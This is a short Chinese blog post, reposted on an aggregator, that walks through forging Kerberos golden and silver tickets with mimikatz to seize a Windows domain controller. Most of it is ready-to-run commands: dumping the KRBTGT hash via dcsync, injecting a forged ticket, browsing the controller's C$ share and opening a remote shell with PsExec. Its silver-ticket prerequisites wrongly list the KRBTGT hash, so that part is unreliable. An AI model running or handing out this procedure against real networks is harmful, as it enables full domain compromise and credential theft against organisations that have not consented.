首页 > 其他 > 详细

黄金票据和白银票据获取域控权限

时间:2020-04-06 10:38:11      阅读:273      评论:0      收藏:0      [点我收藏+]

黄金票据

前提条件

  1. 域名称
  2. 域的SID值
  3. 域的KRBTGT账户的 Hash NTLM
  4. 伪造的用户名(这里是 administrator ),可以是任意用户甚至是不存在的用户

利用

mimikatz的下载地址:https://github.com/gentilkiwi/mimikatz
PsExec的下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

ipconfig /all    #获取域名(前提条件1)

whoami /all    #获取域SID值(前提条件2)

lsadump::dcsync /domain: /*域名*/  /user:krbtgt    #获取KRBTGT账户的 Hash NTLM(前提条件3)

klist purge    #删除票证

kerberos::golden /admin:administrator /domain: /*域名*/  /sid: /*SID*/  /krbtgt: /*Hash NTLM*/ /ptt    #伪造票据(前提条件4)

dir \\abc.test.com\c$    #查看域控的C盘目录(abc.test.com为域控全名)

PsExec.exe \\abc.test.com cmd    #使用PsExec获取一个cmdshell

白银票据

前提条件

  1. 域名称
  2. 域的SID值
  3. 域的KRBTGT账户的 Hash NTLM
  4. 伪造的用户名(这里是 test ),可以是任意用户甚至是不存在的用户

利用

伪造票据命令如下:

kerberos::golden /domain: /*域名*/ /sid: /*SID值*/ /target: /*域控全名*/ /service:cifs /rc4:/*Hash NTLM*/ /user:test /ptt

黄金票据和白银票据获取域控权限

原文:https://www.cnblogs.com/riyir/p/12640203.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!